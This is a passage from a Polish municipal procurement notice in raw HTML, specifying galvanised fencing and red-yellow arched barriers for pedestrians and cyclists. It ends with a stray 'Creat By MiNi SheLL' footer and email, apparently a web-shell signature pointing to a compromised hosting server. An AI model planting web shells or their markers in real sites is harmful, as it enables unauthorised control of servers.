4.	łączników śrubowych wykonanych ze śrub zamkowych M8x45, M8x70 i M8x90, spełniających wymagania normy PN-M-82406:1987.

Wymagania ogólne:
-	Cała konstrukcja ogrodzenia powinna być ocynkowana ogniowo. Zabezpieczenie antykorozyjne wszystkich elementów poprzez cynkowanie ogniowo (gwarancja min 10 lat od daty odbioru). Grubość powłoki cynkowej powinna spełniać wymagania normy PN-EN ISO 1461:2000;
-	połączenia spawane powinny być wykonane poprzez spawanie elektryczne w osłonie gazowej spoiną pachwinową lub doczołową o grubości spoiny 3mm, spełniającą wymagania normy PN-EN 970:1999.
-	Ogrodzenie powinno być oznakowane znakiem budowlanym zgodnie z Rozporządzeniem Ministra Infrastruktury z dnia 11 sierpnia 2004r. w sprawie deklarowania zgodności wyrobów budowlanych oraz sposobu znakowania ich znakiem budowlanym  (Dz. U. Nr 198, poz 2041)..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 34.99.00.00-3.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 6 <b>NAZWA:</b> sprzedaż wraz z transportem URZĄDZEŃ ZABEZPIECZAJĄCYCH RUCH PIESZYCH I ROWERZYSTÓW.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> sprzedaż wraz z transportem URZĄDZEŃ ZABEZPIECZAJĄCYCH RUCH PIESZYCH I ROWERZYSTÓW  o wartości do 10 000, 00 zł netto 
Zgodnie z prawem opcji, Zamawiający gwarantuje zakup 40% oszacowanej i podanej wyżej maksymalnej wartości elementów. Dostawa ponad gwarantowany próg zależna będzie od potrzeb Zamawiającego oraz dysponowania przez niego stosownymi środkami na podstawie budżetu miasta, przy czym nie zakupione przez Zamawiającego elementy ponad gwarantowaną ilość nie stanowią  podstaw do żadnych roszczeń Wykonawcy. Skorzystanie z prawa opcji nastąpi poprzez powiadomienie Wykonawcy o rozszerzeniu zamówienia w okresie trwania umowy i nie wymaga zmiany umowy zawartej w drodze przedmiotowego postępowania.

BARIERY ŁUKOWATE KOMPLETNE (BARIERA +SŁUPEK Z KOTWAMI I ZE ŚRUBAMI) jak na rys. niżej.

1	Bariery powinny być wykonane z rurek stalowych bezszwowych.
2.	Bariery i słupki montażowe powinny być ocynkowane ogniowo zgodnie z DIN EN ISO 1461.
3.	Minimalna grubość powłoki cynku (dla materiałów gr. 3-6 mm) 70 mikrom, dopuszczalna odchyłka - 10 mikrom.
Przygotowanie powierzchni elementów cynkowanych należy wykonać w oparciu o PrPN EN ISO 12944 cz.4
4.	Elementy montażowe (śruby, nakrętki, podkładki) ocynkowane ogniowo.
WYMAGANIA W ZAKRESIE MALOWANIA SŁUPKÓW MONTAŻOWYCH I BARIER OCHRONNYCH :
kolor bariery - zgodnie z rysunkiem:	
ŻÓŁTY I CZERWONY RAL 7043 (z elementami odblaskowymi z folii II typu - 	WYSOKOŚĆ ELEMENTU ODBLASKOWEGO 20 CM)
Przy opracowaniu technologii malowania należy uwzględnić miejsce użytkowania barier - atmosfera miejska.
	elementy lakierowane :
gruntowanie : dwuskładnikowy podkład akrylowo-poliuretanowy z utwardzaczem do wyrobów poliuretanowych - 2 powłoki malarskie***; powłoka nawierzchniowa : z emalii dwuskładnikowej poliuretanowej z utwardzaczem - 2 powłoki malarskie***
*** dopuszcza się zastosowanie farby proszkowej poliestrowej (farbami piecowymi) zamiast technologii na mokro farbami poliuretanowymi.
5.	Wymagana gwarancja to 5 lat (nie dotyczy uszkodzeń mechanicznych).
A.	Bariera łukowata długości 1600 mm (dla długości 2000 mm pozostałe wymiary bez zmian) CZERWONO-ŻÓŁTA:
B.	Bariera łukowata długości 1600 mm (dla długości 2000 mm pozostałe wymiary bez zmian) RAL 7043.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 34.99.00.00-3.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com